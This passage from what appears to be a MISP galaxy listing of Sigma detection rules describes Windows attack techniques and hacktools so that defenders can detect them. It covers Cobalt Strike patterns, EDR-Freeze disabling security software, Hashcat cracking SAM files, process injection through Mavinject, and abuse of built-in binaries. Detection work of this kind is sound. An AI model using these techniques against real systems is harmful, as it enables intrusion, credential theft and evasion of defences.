- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) |
| creation_date | 2019-02-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_csc_susp_parent.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.005', 'attack.t1059.007', 'attack.defense-evasion', 'attack.t1218.005', 'attack.t1027.004'] |
HackTool - SharpMove Tool Execution
Detects the execution of SharpMove, a .NET utility that performs multiple tasks such as "Task Creation", "SCM" query and VBScript execution using WMI, based on its PE metadata and command line options.
Internal MISP references
UUID 055fb54c-a8f4-4aee-bd44-f74cf30a0d9d which can be used as unique global reference for HackTool - SharpMove Tool Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Luca Di Bartolomeo (CrimpSec) |
| creation_date | 2024-01-29 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_sharpmove.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.t1021.002'] |
Potentially Suspicious Desktop Background Change Using Reg.EXE
Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
Internal MISP references
UUID 8cbc9475-8d05-4e27-9c32-df960716c701 which can be used as unique global reference for Potentially Suspicious Desktop Background Change Using Reg.EXE in MISP communities and other software using the MISP galaxy
External references
- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI - webarchive
- https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ - webarchive
- https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior - webarchive
- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper - webarchive
- https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html - webarchive
- https://www.attackiq.com/2023/09/20/emulating-rhysida/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_desktop_background_change.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Stephen Lincoln @slincoln-aiq (AttackIQ) |
| creation_date | 2023-12-21 |
| falsepositive | ['Administrative scripts that change the desktop background to a company logo or other image.'] |
| filename | proc_creation_win_reg_desktop_background_change.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.impact', 'attack.t1112', 'attack.t1491.001'] |
Use of VisualUiaVerifyNative.exe
VisualUiaVerifyNative.exe is a Windows SDK binary that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
Internal MISP references
UUID b30a8bc5-e21b-4ca2-9420-0a94019ac56a which can be used as unique global reference for Use of VisualUiaVerifyNative.exe in MISP communities and other software using the MISP galaxy
External references
- https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ - webarchive
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac - webarchive
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/ - webarchive
- https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christopher Peacock @SecurePeacock, SCYTHE @scythe_io |
| creation_date | 2022-06-01 |
| falsepositive | ['Legitimate testing of Microsoft UI parts.'] |
| filename | proc_creation_win_lolbin_visualuiaverifynative.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
PsExec Service Child Process Execution as LOCAL SYSTEM
Detects a suspicious launch of the PSEXESVC service on this system with a child process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with the highest privileges and not only the privileges of the logged-in user account (e.g. the administrator account)
Internal MISP references
UUID 7c0dcd3d-acf8-4f71-9570-f448b0034f94 which can be used as unique global reference for PsExec Service Child Process Execution as LOCAL SYSTEM in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension'] |
| filename | proc_creation_win_sysinternals_psexesvc_as_system.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Computer System Reconnaissance Via Wmic.EXE
Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
Internal MISP references
UUID 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f which can be used as unique global reference for Computer System Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-08 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmic_recon_computersystem.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.execution', 'attack.t1047'] |
Potentially Suspicious Child Processes Spawned by ConHost
Detects suspicious child processes related to Windows Shell utilities spawned by conhost.exe, which could indicate malicious activity using trusted system components.
Internal MISP references
UUID dfa03a09-8b92-4d83-8e74-f72839b1c407 which can be used as unique global reference for Potentially Suspicious Child Processes Spawned by ConHost in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-02-05 |
| falsepositive | ['Legitimate administrative tasks using conhost.exe to spawn child processes such as cmd.exe, powershell.exe, or regsvr32.exe.'] |
| filename | proc_creation_win_conhost_susp_winshell_child_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.t1202', 'attack.defense-evasion', 'attack.t1218'] |
HackTool - Impersonate Execution
Detects execution of the Impersonate tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively
Internal MISP references
UUID cf0c254b-22f1-4b2b-8221-e137b3c0af94 which can be used as unique global reference for HackTool - Impersonate Execution in MISP communities and other software using the MISP galaxy
External references
- https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/ - webarchive
- https://github.com/sensepost/impersonate - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Sai Prashanth Pulisetti @pulisettis |
| creation_date | 2022-12-21 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_impersonate.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1134.001', 'attack.t1134.003'] |
Potential Process Execution Proxy Via CL_Invocation.ps1
Detects calls to "SyncInvoke", which is part of the "CL_Invocation.ps1" script, to proxy execution using "System.Diagnostics.Process"
Internal MISP references
UUID a0459f02-ac51-4c09-b511-b8c9203fc429 which can be used as unique global reference for Potential Process Execution Proxy Via CL_Invocation.ps1 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova |
| creation_date | 2020-10-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_cl_invocation.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1216'] |
Hacktool - EDR-Freeze Execution
Detects execution of EDR-Freeze, a tool that exploits the MiniDumpWriteDump function and WerFaultSecure.exe to suspend EDR and Antivirus processes on Windows. EDR-Freeze leverages a race-condition attack to put security processes into a dormant state by suspending WerFaultSecure at the moment it freezes the target process. This technique does not require kernel-level exploits or BYOVD, but instead abuses user-mode functionality to temporarily disable monitoring by EDR or Antimalware solutions.
Internal MISP references
UUID c598cc0c-9e70-4852-b9eb-8921af79f598 which can be used as unique global reference for Hacktool - EDR-Freeze Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-09-24 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_hktl_edr_freeze.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Sysinternals PsService Execution
Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
Internal MISP references
UUID 3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f which can be used as unique global reference for Sysinternals PsService Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-16 |
| falsepositive | ['Legitimate use of PsService by an administrator'] |
| filename | proc_creation_win_sysinternals_psservice.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.discovery', 'attack.persistence', 'attack.t1543.003'] |
Potentially Suspicious Child Process Of ClickOnce Application
Detects potentially suspicious child processes of a ClickOnce deployment application
Internal MISP references
UUID 67bc0e75-c0a9-4cfc-8754-84a505b63c04 which can be used as unique global reference for Potentially Suspicious Child Process Of ClickOnce Application in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-06-12 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_dfsvc_suspicious_child_processes.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion'] |
PUA - NimScan Execution
Detects usage of NimScan, a portscanner utility. In early 2025, adversaries were observed using this utility to scan for open ports on remote hosts in a compromised environment. This rule identifies the execution of NimScan based on the process image name and specific hash values associated with different versions of the tool.
Internal MISP references
UUID 4fd6b1c7-19b8-4488-97f6-00f0924991a3 which can be used as unique global reference for PUA - NimScan Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-02-05 |
| falsepositive | ['Legitimate administrator activity'] |
| filename | proc_creation_win_pua_nimscan.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1046'] |
Suspicious Execution of Shutdown
Detects use of the command line to shut down or reboot Windows
Internal MISP references
UUID 34ebb878-1b15-4895-b352-ca2eeb99b274 which can be used as unique global reference for Suspicious Execution of Shutdown in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-01 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_shutdown_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1529'] |
Potentially Suspicious Child Process Of DiskShadow.EXE
Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
Internal MISP references
UUID 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 which can be used as unique global reference for Potentially Suspicious Child Process Of DiskShadow.EXE in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4 - webarchive
- https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow - webarchive
- https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - webarchive
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware - webarchive
- https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_child_process_susp.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-09-15 |
| falsepositive | ['False positives can occur in cases where admin scripts leverage the "exec" flag to execute applications'] |
| filename | proc_creation_win_diskshadow_child_process_susp.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Application Terminated Via Wmic.EXE
Detects calls to the "terminate" function via wmic in order to kill an application
Internal MISP references
UUID 49d9671b-0a0a-4c09-8280-d215bfd30662 which can be used as unique global reference for Application Terminated Via Wmic.EXE in MISP communities and other software using the MISP galaxy
External references
- https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_terminate_application.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-09-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmic_terminate_application.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047'] |
Related clusters
To see the related clusters, click here.
PUA - Nimgrab Execution
Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.
Internal MISP references
UUID 74a12f18-505c-4114-8d0b-8448dd5485c6 which can be used as unique global reference for PUA - Nimgrab Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-28 |
| falsepositive | ['Legitimate use of Nim on developer systems'] |
| filename | proc_creation_win_pua_nimgrab.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1105'] |
Related clusters
To see the related clusters, click here.
HackTool - WinRM Access Via Evil-WinRM
Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Internal MISP references
UUID a197e378-d31b-41c0-9635-cfdf1c1bb423 which can be used as unique global reference for HackTool - WinRM Access Via Evil-WinRM in MISP communities and other software using the MISP galaxy
External references
- https://github.com/Hackplayers/evil-winrm - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-07 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_evil_winrm.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.t1021.006'] |
Related clusters
To see the related clusters, click here.
HackTool - Hashcat Password Cracker Execution
Detects execution of Hashcat.exe with a SAM file extracted from the Windows registry and a password list to crack against
Internal MISP references
UUID 39b31e81-5f5f-4898-9c0e-2160cfc0f9bf which can be used as unique global reference for HackTool - Hashcat Password Cracker Execution in MISP communities and other software using the MISP galaxy
External references
- https://hashcat.net/wiki/doku.php?id=hashcat - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-12-27 |
| falsepositive | ['Tools that use similar command line flags and values'] |
| filename | proc_creation_win_hktl_hashcat.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1110.002'] |
Related clusters
To see the related clusters, click here.
Forfiles.EXE Child Process Masquerading
Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
Internal MISP references
UUID f53714ec-5077-420e-ad20-907ff9bb2958 which can be used as unique global reference for Forfiles.EXE Child Process Masquerading in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Anish Bogati |
| creation_date | 2024-01-05 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_forfiles_child_process_masquerading.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036'] |
Related clusters
To see the related clusters, click here.
Permission Misconfiguration Reconnaissance Via Findstr.EXE
Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This was seen being used in combination with "icacls" and other utilities to spot misconfigured file or folder permissions.
Internal MISP references
UUID 47e4bab7-c626-47dc-967b-255608c9a920 which can be used as unique global reference for Permission Misconfiguration Reconnaissance Via Findstr.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-12 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_findstr_recon_everyone.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1552.006'] |
Related clusters
To see the related clusters, click here.
Arbitrary MSI Download Via Devinit.EXE
Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
Internal MISP references
UUID 90d50722-0483-4065-8e35-57efaadd354d which can be used as unique global reference for Arbitrary MSI Download Via Devinit.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_devinit_lolbin_usage.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Read Contents From Stdin Via Cmd.EXE
Detects the use of "<" to read and potentially execute a file via cmd.exe
Internal MISP references
UUID 241e802a-b65e-484f-88cd-c2dc10f9206d which can be used as unique global reference for Read Contents From Stdin Via Cmd.EXE in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md - webarchive
- https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-03-07 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_cmd_stdin_redirect.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.003'] |
Related clusters
To see the related clusters, click here.
Potential Password Spraying Attempt Using Dsacls.EXE
Detects possible password spraying attempts using Dsacls
Internal MISP references
UUID bac9fb54-2da7-44e9-988f-11e9a5edbc0c which can be used as unique global reference for Potential Password Spraying Attempt Using Dsacls.EXE in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11) - webarchive
- https://ss64.com/nt/dsacls.html - webarchive
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-20 |
| falsepositive | ['Legitimate use of dsacls to bind to an LDAP session'] |
| filename | proc_creation_win_dsacls_password_spray.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Use of Pcalua For Execution
Detects execution of commands and binaries from the context of the Program Compatibility Assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
Internal MISP references
UUID 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2 which can be used as unique global reference for Use of Pcalua For Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community |
| creation_date | 2022-06-14 |
| falsepositive | ['Legitimate use via a batch script or by an administrator.'] |
| filename | proc_creation_win_lolbin_pcalua.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Related clusters
To see the related clusters, click here.
Potential CobaltStrike Process Patterns
Detects potential process patterns related to Cobalt Strike beacon activity
Internal MISP references
UUID f35c5d71-b489-4e22-a115-f003df287317 which can be used as unique global reference for Potential CobaltStrike Process Patterns in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ - webarchive
- https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2021-07-27 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_cobaltstrike_process_patterns.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Related clusters
To see the related clusters, click here.
Suspicious Use of PsLogList
Detects usage of the PsLogList utility to dump event logs in order to extract admin accounts and perform account discovery, or to delete event logs
Internal MISP references
UUID aae1243f-d8af-40d8-ab20-33fc6d0c55bc which can be used as unique global reference for Suspicious Use of PsLogList in MISP communities and other software using the MISP galaxy
External references
- https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList - webarchive
- https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos - webarchive
- https://twitter.com/EricaZelic/status/1614075109827874817 - webarchive
- https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2021-12-18 |
| falsepositive | ['Another tool that uses the command line switches of PsLogList', 'Legitimate use of PsLogList by an administrator'] |
| filename | proc_creation_win_sysinternals_psloglist.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1087', 'attack.t1087.001', 'attack.t1087.002'] |
Related clusters
To see the related clusters, click here.
Suspicious DLL Loaded via CertOC.EXE
Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
Internal MISP references
UUID 84232095-ecca-4015-b0d7-7726507ee793 which can be used as unique global reference for Suspicious DLL Loaded via CertOC.EXE in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Certoc/ - webarchive
- https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - webarchive
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-15 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_certoc_load_dll_susp_locations.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Add Insecure Download Source To Winget
Detects usage of winget to add a new insecure (http) download source. Winget does not allow the addition of insecure sources, so such an attempt could indicate potentially suspicious activity (or a typo)
Internal MISP references
UUID 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 which can be used as unique global reference for Add Insecure Download Source To Winget in MISP communities and other software using the MISP galaxy
External references
- https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget - webarchive
- https://learn.microsoft.com/en-us/windows/package-manager/winget/source - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-04-17 |
| falsepositive | ['False positives might occur if the users are unaware of such control checks'] |
| filename | proc_creation_win_winget_add_insecure_custom_source.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1059'] |
Related clusters
To see the related clusters, click here.
Use Of The SFTP.EXE Binary As A LOLBIN
Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
Internal MISP references
UUID a85ffc3a-e8fd-4040-93bf-78aff284d801 which can be used as unique global reference for Use Of The SFTP.EXE Binary As A LOLBIN in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-11-10 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_lolbin_sftp.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Renamed Mavinject.EXE Execution
Detects the execution of a renamed version of the "Mavinject" process, which can be abused to perform process injection using the "/INJECTRUNNING" flag
Internal MISP references
UUID e6474a1b-5390-49cd-ab41-8d88655f7394 which can be used as unique global reference for Renamed Mavinject.EXE Execution in MISP communities and other software using the MISP galaxy
External references
- https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e - webarchive
- https://twitter.com/Hexacorn/status/776122138063409152 - webarchive
- https://reaqta.com/2017/12/mavinject-microsoft-injector/ - webarchive
- https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection - webarchive
- https://github.com/SigmaHQ/sigma/issues/3742 - webarchive
- https://twitter.com/gN3mes1s/status/941315826107510784 - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Florian Roth |
| creation_date | 2022-12-05 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_renamed_mavinject.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055.001', 'attack.t1218.013'] |
Related clusters
To see the related clusters, click here.
Remote Access Tool - Team Viewer Session Started On Windows Host
Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
Internal MISP references
UUID ab70c354-d9ac-4e11-bbb6-ec8e3b153357 which can be used as unique global reference for Remote Access Tool - Team Viewer Session Started On Windows Host in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Josh Nickels, Qi Nan |
| creation_date | 2024-03-11 |
| falsepositive | ['Legitimate usage of TeamViewer'] |
| filename | proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml |
| level | low |
| logsource.category | process_creation |
